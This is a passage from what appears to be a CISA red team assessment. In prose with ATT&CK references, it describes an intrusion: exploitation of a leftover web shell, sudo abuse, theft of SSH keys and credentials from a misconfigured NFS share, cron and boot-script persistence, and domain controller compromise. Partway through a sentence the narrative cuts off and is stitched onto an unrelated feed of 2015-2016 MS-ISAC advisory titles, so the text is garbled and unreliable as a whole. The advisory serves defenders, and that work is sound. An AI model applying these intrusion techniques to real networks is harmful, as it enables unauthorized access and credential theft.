href="https://attack.mitre.org/versions/v16/techniques/T1590/006/">T1590.006</a>], and employees [<a href="https://attack.mitre.org/versions/v16/techniques/T1589/003/">T1589.003</a>]. The red team designed spearphishing campaigns [<a href="https://attack.mitre.org/versions/v16/techniques/T1566/">T1566</a>] tailored to employees most likely to communicate with external parties. The phishing attempts were ultimately unsuccessful—targets ran the payloads [<a href="https://attack.mitre.org/versions/v16/techniques/T1204/">T1204</a>], but their execution did not result in the red team gaining access into the network.</p> <p>After the failed spearphishing campaigns, the red team continued external reconnaissance of the network [<a href="https://attack.mitre.org/versions/v16/techniques/T1595/">T1595</a>] and discovered a web shell [<a href="https://attack.mitre.org/versions/v16/techniques/T1505/003/">T1505.003</a>] left from a previous Vulnerability Disclosure Program (VDP). The red team used this for initial access [<a href="https://attack.mitre.org/versions/v16/tactics/TA0001/">TA0001</a>] and immediately reported it to the organization’s trusted agents (TAs). The red team leveraged that access to escalate privileges [<a href="https://attack.mitre.org/versions/v16/tactics/TA0004/">TA0004</a>] on the host, discover credential material on a misconfigured Network File System (NFS) share [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/001/">T1552.001</a>], and move from a DMZ to the internal network [<a href="https://attack.mitre.org/versions/v16/tactics/TA0008/">TA0008</a>].</p> <p>With access to the internal network, the red team gained further access to several SBSs. The red team leveraged a certificate for client authentication [<a href="https://attack.mitre.org/versions/v16/techniques/T1649/">T1649</a>] they discovered on the NFS share to compromise a system configured for Unconstrained Delegation. This allowed the red team to acquire a ticket granting ticket (TGT) for a domain controller [<a href="https://attack.mitre.org/versions/v16/techniques/T1558/001">T1558.001</a>], used to further compromise the domain. The red team leveraged this level of access to exploit SBS targets provided by the organization’s TAs.</p> <p>The assessed organization detected much of the red team’s activity in their Linux infrastructure after CISA alerted them via other channels to the vulnerability the red team used for initial access. Once given an official notification of a vulnerability, the organization’s network defenders began mitigating the vulnerability. Network defenders removed the site hosting the web shell from the public internet but did not take the server itself offline. A week later, network defenders officially declared an incident once they determined the web shell was used to breach the internal network. For several weeks, network defenders terminated much of the red team’s access until the team maintained implants on only four hosts. Network defenders successfully delayed the red team from accessing many SBSs that required additional positioning, forcing the red team to spend time refortifying their access in the network. Despite these actions, the red team was still able to access a subset of SBSs. Eventually, the red team and TAs decided that the network defenders would stand down to allow the red team to continue its operations in a monitoring mode. In monitoring mode, network defenders would report what they observed of the red team’s access, but not continue to block and terminate it.</p> <p>See <strong>Figure 1</strong> for a timeline of the red team’s activity with key points access. See the following sections for additional details, including the red team’s TTPs.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2024-11/Figure%201%20-%20Timeline%20of%20Red%20Team%20Activity%20%28CI%29.png?itok=nzy7agO2" width="1024" height="567" alt="Figure 1 - Timeline of Red Team Activity (CI)"> </div> <figcaption class="c-figure__caption"><em>Figure 1: Timeline of Red Team Cyber Threat Activity</em></figcaption> </figure> <h4><strong>Initial Access</strong></h4> <p>Following an unsuccessful spearphishing campaign, the red team gained initial access to the target by exploiting an internet-facing Linux web server [<a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>] discovered through reconnaissance [<a href="https://attack.mitre.org/versions/v15/tactics/TA0043/" title="Reconnaissance">TA0043</a>] of the organization’s external internet protocol (IP) space [<a href="https://attack.mitre.org/versions/v15/techniques/T1590/005/" title="Gather Victim Network Information: IP Addresses">T1590.005</a>].</p> <p>The red team first conducted open source research [<a href="https://attack.mitre.org/versions/v15/techniques/T1593/" title="Search Open Websites/Domains">T1593</a>] to identify information about the organization’s network including the tools used to protect the network and potential targets for spearphishing. The red team looked for email addresses [<a href="https://attack.mitre.org/versions/v15/techniques/T1589/002/" title="Gather Victim Identity Information: Email Addresses">T1589.002</a>] and names to infer email addresses from the organization’s email syntax (discovered during reconnaissance). Following, the red team sent tailored spearphishing emails to 13 targets [<a href="https://attack.mitre.org/versions/v15/techniques/T1566/002/" title="Phishing: Spearphishing Link">T1566.002</a>]. Of these 13 targets, one user responded and executed two malicious payloads [<a href="https://attack.mitre.org/versions/v15/techniques/T1204/002/" title="User Execution: Malicious File">T1204.002</a>]. However, the payloads failed to bypass a previously undiscovered technical control employed by the victim organization, which prevented the red team’s first attempt to gain initial access.</p> <p>To find an alternate pathway for initial access, the red team conducted reconnaissance with several publicly available tools, such as <a href="https://www.shodan.io/">Shodan</a> and <a href="https://search.censys.io/">Censys</a>, to discover accessible devices and services on the internet [<a href="https://attack.mitre.org/versions/v15/techniques/T1596/005/" title="Search Open Technical Databases: Scan Databases">T1596.005</a>]. The red team identified an old and unpatched service with a known XML External Entity (XXE) vulnerability and leveraged a public proof of concept to deploy a web shell. The associated product had an exposed endpoint—one that system administrators should typically block from the public internet—that allowed the red team to discover a preexisting web shell on the organization’s Linux web server. The preexisting web shell allowed the red team to run arbitrary commands on the server [<a href="https://attack.mitre.org/versions/v15/techniques/T1059/" title="Command and Scripting Interpreter">T1059</a>] as a user (WEBUSER1). Using the web shell, the red team identified an open internal proxy server [<a href="https://attack.mitre.org/versions/v15/techniques/T1016/" title="System Network Configuration Discovery">T1016</a>] to send outbound communications to the internet via Hypertext Transfer Protocol Secure (HTTPS). The red team then downloaded [<a href="https://attack.mitre.org/versions/v15/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>] and executed a&nbsp;<a href="https://attack.mitre.org/versions/v14/software/S0633/">Sliver</a> payload that utilized this proxy to establish command and control (C2) over this host, calling back to their infrastructure [<a href="https://attack.mitre.org/versions/v15/tactics/TA0011/" title="Command and Control">TA0011</a>].</p> <p><strong>Note: </strong>Because the web shell and unpatched vulnerability allowed actors to easily gain initial access to the organization, the CISA red team determined this was a critical vulnerability. CISA reported both the vulnerability and the web shell to the organization in an official vulnerability notification so the organization could remediate both issues. Following this notification, the victim organization initiated threat hunting activities, detecting some of the red team’s activity. The TAs determined that network defenders had previously identified and reported the vulnerability but did not remediate it. Further, the TAs found that network defenders were unaware of the web shell and believed it was likely leftover from prior VDP activity. See the <strong>Defense Evasion and Victim Network Defense Activities</strong> section for more information.</p> <h4><strong>Linux Infrastructure Compromise</strong></h4> <h5><em>Local Privilege Escalation and Credential Access</em></h5> <p>The red team then moved laterally from the web server to the organization’s internal network using valid accounts [<a href="https://attack.mitre.org/versions/v16/techniques/T1078/">T1078</a>] as the DMZ was not properly segmented from the organization’s internal domain.</p> <p>The red team acquired credentials [<a href="https://attack.mitre.org/versions/v16/tactics/TA0006/">TA0006</a>] by first escalating privileges on the web server. The team discovered that WEBUSER1 had excessive <code>sudo</code> rights, allowing them to run some commands as root commands without a password. They used these elevated rights to deploy a new callback with root access [<a href="https://attack.mitre.org/versions/v16/techniques/T1548/003/">T1548.003</a>].</p> <p>With root access to the web server, the team had full access to the organization’s directories and files on a NFS share with <code>no_root_squash</code> enabled. If <code>no_root_squash</code> is used, remote root users can read and change any file on the shared file system and leave a trojan horse [<a href="https://attack.mitre.org/versions/v16/techniques/T1080/">T1080</a>] for other users to inadvertently execute. On Linux operating systems this option is disabled by default, yet the organization enabled it to accommodate several legacy systems. The organization’s decision to enable the <code>no_root_squash</code> option allowed the red team to read all the files on the NFS share once it escalated its privileges on a single host with the NFS share mounted. This NFS share hosted the home directories of hundreds of Linux users—many of which had privileged access to one or more servers—and was auto-mounted when those users logged into Linux hosts in the environment.</p> <p>The red team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/003/">T1552.003</a>], and other sensitive data across all user files on the NFS share [<a href="https://attack.mitre.org/versions/v16/techniques/T1039/">T1039</a>]. The team initially obtained 61 private SSH keys [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/004/">T1552.004</a>] and a file containing valid cleartext domain credentials (DOMAINUSER1) that the team used to authenticate to the organization’s domain [<a href="https://attack.mitre.org/versions/v16/techniques/T1078/002/">T1078.002</a>].</p> <h5><em><strong>Linux Command and Control</strong></em></h5> <p>In the organization’s Linux environment, the red team leveraged HTTPS connections for C2 [<a href="https://attack.mitre.org/versions/v15/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>]. Most of the Linux systems could not directly access the internet, but the red team circumvented this by leveraging an open internal HTTPS proxy [<a href="https://attack.mitre.org/versions/v15/techniques/T1090/001/" title="Proxy: Internal Proxy">T1090.001</a>] for their traffic.</p> <h5><em><strong>Lateral Movement and Persistence</strong></em></h5> <p>The red team’s acquisition of SSH private keys generated for user and service accounts facilitated unrestricted lateral movement to other Linux hosts [<a href="https://attack.mitre.org/versions/v16/techniques/T1021/004/">T1021.004</a>]. This acquisition included two highly privileged accounts with root access to hundreds of servers. Within one week of initial access, the team moved to multiple Linux servers and established persistence [<a href="https://attack.mitre.org/versions/v16/tactics/TA0003/">TA0003</a>] on four. The team used a different persistence mechanism on each Linux host, so network defenders would be less likely to discover the red team’s presence on all four hosts. The team temporarily backdoored several scripts run at boot time to maintain persistence [<a href="https://attack.mitre.org/versions/v16/techniques/T1037/">T1037</a>], ensuring the original versions of the scripts were re-enabled once the team successfully achieved persistence. Some of the team’s techniques included modifying preexisting scripts run by the <code>cron</code> utility [<a href="https://attack.mitre.org/versions/v16/techniques/T1053/003/">T1053.003</a>] and <code>ifup-post</code> scripts [<a href="https://attack.mitre.org/versions/v16/techniques/T1037/003/">T1037.003</a>].</p> <p>Of note, the team gained root access to an SBS-adjacent infrastructure management server that ran Ansible Tower. Access to this Ansible Tower system [<a href="https://attack.mitre.org/versions/v16/techniques/T1072/">T1072</a>] provided easy access to multiple SBSs. The team discovered a root SSH private key on the host, which allowed the team to move to six SBSs across six different sensitive IP ranges. A week after the team provided screenshots of root access to the SBSs to the TAs, the TAs deconflicted the red team’s access to the Ansible Tower system that network defenders discovered. The organization detected the compromise by observing abnormal usage of the root SSH private key. The root SSH private key was used to log into multiple hosts at times and for durations outside of preestablished baselines. In a real compromise, the organization would have had to shut down the server, significantly impacting business operations.</p> <h4><strong>Windows Domain Controller Compromise</strong></h4> <p>Approximately two weeks after gaining initial access, the red team compromised a Windows domain controller. This compromise allowed the team to move laterally to all domain-joined Windows hosts within the organization.</p> <p>To first gain situational awareness about the organization’s environment, the red team exfiltrated Activ Multiple Vulnerabilities in Mozilla Firefox Could Allow for Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2016-018.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:9adc2502-066a-b6aa-e508-9840b8ba6c85 Wed, 27 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Magento eCommerce Platform Could Allow Remote Code Execution https://msisac.cisecurity.org/advisories/2016/2016-019.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:958cbee4-52f7-6b2f-3e15-f83880b92e79 Tue, 26 Jan 2016 05:00:00 +0000 ... Vulnerability in AMX Harman Professional Devices Could Allow Unauthorized Remote Access https://msisac.cisecurity.org/advisories/2016/2016-017.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:df326835-82de-bc7c-ff12-7aca82a6d1d5 Mon, 25 Jan 2016 05:00:00 +0000 ... Vulnerability in Fortinet FortiOS Could Allow Unauthorized Remote Access https://msisac.cisecurity.org/advisories/2016/2015-012-2.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:f1627017-2426-80ad-1b8a-8fcca8ad5ac5 Mon, 25 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2016-016.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:cdee89e3-ccf6-2ea1-99c4-4a1d0280813e Thu, 21 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in PHP Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2016-002-02.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:e474be2e-4618-0cc3-405f-0bd925e22bdc Thu, 21 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Apple Products Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2016-015.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:cd46607a-140e-6d66-5a28-0acea3e2cc04 Wed, 20 Jan 2016 05:00:00 +0000 ... Oracle Quarterly Critical Patches Issued January 19, 2016 https://msisac.cisecurity.org/advisories/2016/2016-014.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:1da62e6c-b577-79df-dc31-058bec3983eb Tue, 19 Jan 2016 05:00:00 +0000 ... Vulnerability in Microsoft Silverlight Could Allow Remote Code Execution (MS16-006) https://msisac.cisecurity.org/advisories/2016/2016-009-2.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:da2a0033-2f85-ab84-921a-4e3f4123e051 Fri, 15 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Cisco Products Could Allow for Unauthenticated, Remote Access https://msisac.cisecurity.org/advisories/2016/2016-013.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:7afa4e01-a127-8143-8aa9-4dce35f24fd1 Thu, 14 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS16-004) https://msisac.cisecurity.org/advisories/2016/2016-007.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:51c36ca0-030f-defe-e111-0b486577e9d2 Tue, 12 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Acrobat and Adobe Reader Could Allow for Remote Code Execution (APSB16-02) https://msisac.cisecurity.org/advisories/2016/2016-011.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:131cc697-e5a0-4bf2-04b6-f40209cf74b1 Tue, 12 Jan 2016 05:00:00 +0000 ... Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (MS16-007) https://msisac.cisecurity.org/advisories/2016/2016-010.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:c7647d08-16a3-ec5d-881f-ae8abf2167db Tue, 12 Jan 2016 05:00:00 +0000 ... Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (MS16-005) https://msisac.cisecurity.org/advisories/2016/2016-008.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:e9b1eb09-49bb-6a0c-ea78-e04c091bd2e2 Tue, 12 Jan 2016 05:00:00 +0000 ... A Vulnerability in VBScript Scripting Engine Could Allow for Remote Code Execution (MS16-003) https://msisac.cisecurity.org/advisories/2016/2016-006.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:093cf3fe-3347-432a-f2e9-7aa1a18445ef Tue, 12 Jan 2016 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS16-002) https://msisac.cisecurity.org/advisories/2016/2016-005.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:aca4c6fc-44b6-fbb5-324b-7762cfb02297 Tue, 12 Jan 2016 05:00:00 +0000 ... Cumulative Security Update for Internet Explorer (MS16-001) https://msisac.cisecurity.org/advisories/2016/2016-004.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:4af1b3f3-9d0c-9c87-aa9e-201423fa8450 Tue, 12 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Apple QuickTime Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2015-003.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:1594dfb7-e178-038d-bf44-d91483df581e Fri, 08 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Google Android Could Allow for Remote Code Execution https://msisac.cisecurity.org/advisories/2016/2016-001.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:49fa7472-6ff5-7a0d-1ff9-6fd8f94f62f6 Tue, 05 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player and AIR Could Allow Remote Code Execution (APSB16-01) https://msisac.cisecurity.org/advisories/2015/2015-157.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:d49b87c4-d723-ce3e-a211-f26077bb8187 Mon, 28 Dec 2015 05:00:00 +0000 ... Multiple vulnerabilities in Joomla Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2015/2015-155.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:aca4a417-9d66-39d7-7efd-10c3ed81f140 Wed, 23 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Juniper ScreenOS Could Allow Unauthorized, Remote Access or Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-154-2.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:bee3b333-ea1a-ad4a-b7d3-1e06c4959e78 Tue, 22 Dec 2015 05:00:00 +0000 ... Vulnerability in Apache Commons Collections Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2015/2015-152-2.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:84ba94da-2704-9bbe-ee33-aa132a32d4d8 Tue, 22 Dec 2015 05:00:00 +0000 ... Vulnerability in FireEye Products Could Allow for Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-153.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:127c9edd-8a9d-021c-bc3b-7ad69717407f Thu, 17 Dec 2015 05:00:00 +0000 ... Vulnerability in Joomla Could Allow Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-150.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:1cdb6f41-30e6-a393-6bcb-ea02c79ae702 Tue, 15 Dec 2015 05:00:00 +0000 ... Vulnerability in Cisco Products Could Allow Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-149.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:9b7442ff-0a3c-26e8-35b3-e24e9c321591 Tue, 15 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Apple Products Could Allow Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-147.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:8431c24a-cf5e-bb59-d1aa-b39f6087f11d Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player Could Allow Remote Code Execution (APSB15-32) https://msisac.cisecurity.org/advisories/2015/2015-146.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:67aec496-0d3c-7263-65ba-d32bb9253606 Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Windows Media Center Could Allow Remote Code Execution (MS15-134) https://msisac.cisecurity.org/advisories/2015/2015-145.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:32b25e4a-a95f-dfca-83b9-53a5e0f20cf1 Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS15-131) https://msisac.cisecurity.org/advisories/2015/2015-144.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:49ed1022-532f-1a03-a853-a5c1ea94458a Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerability in Microsoft Uniscribe Could Allow Remote Code Execution (MS15-130) https://msisac.cisecurity.org/advisories/2015/2015-143.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:6a960434-2082-adb7-41c6-33f14d006b55 Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Silverlight Could Allow Remote Code Execution (MS15-129) https://msisac.cisecurity.org/advisories/2015/2015-142.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:79080def-5f33-f1c8-e06f-1d5a067c930c Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (MS15-128) https://msisac.cisecurity.org/advisories/2015/2015-141.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:0ba6dee7-37ab-49c8-16be-c662fd0d5f18 Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerability in Microsoft DNS Server Could Allow Remote Code Execution (MS15-127) https://msisac.cisecurity.org/advisories/2015/2015-140.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:a5d8e4c8-c3fb-a6aa-73fc-01b7f2cca536 Tue, 08 Dec 2015 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS15-125) https://msisac.cisecurity.org/advisories/2015/2015-139.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:860d3943-1301-190e-4141-fae83930e809 Tue, 08 Dec 2015 05:00:00 +0000 ... Cumulative Security Update for Internet Explorer (MS15-124) https://msisac.cisecurity.org/advisories/2015/2015-138.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:53e841bd-63b7-c50e-1936-cd75e23081eb Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player Could Allow for Remote Code Execution (APSB15-28) https://msisac.cisecurity.org/advisories/2015/2015-136.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:e7822102-d9ff-e076-8a90-6d0477246eed Tue, 10 Nov 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS15-116) https://msisac.cisecurity.org/advisories/2015/2015-135.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:355540f6-fea2-8186-3756-883fde22ccd6 Tue, 10 Nov 2015 05:00:00 +0000 ... Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (MS15-115) https://msisac.cisecurity.org/advisories/2015/2015-134.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:79fbfcfa-a172-4391-94a5-8f5b9d2ff63d Tue, 10 Nov 2015 05:00:00 +0000 ... Vulnerability in Microsoft Windows Journal Could Allow Remote Code Execution (MS15-114) https://msisac.cisecurity.org/advisories/2015/2015-133.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:e672163a-0672-f5e5-6bf4-978b6a64f73b Tue, 10 Nov 2015 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS15-113) https://msisac.cisecurity.org/advisories/2015/2015-132.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:426a6b23-ba3b-cf15-4285-b9e05950cd48 Tue, 10 Nov 2015 05:00:00 +0000 ...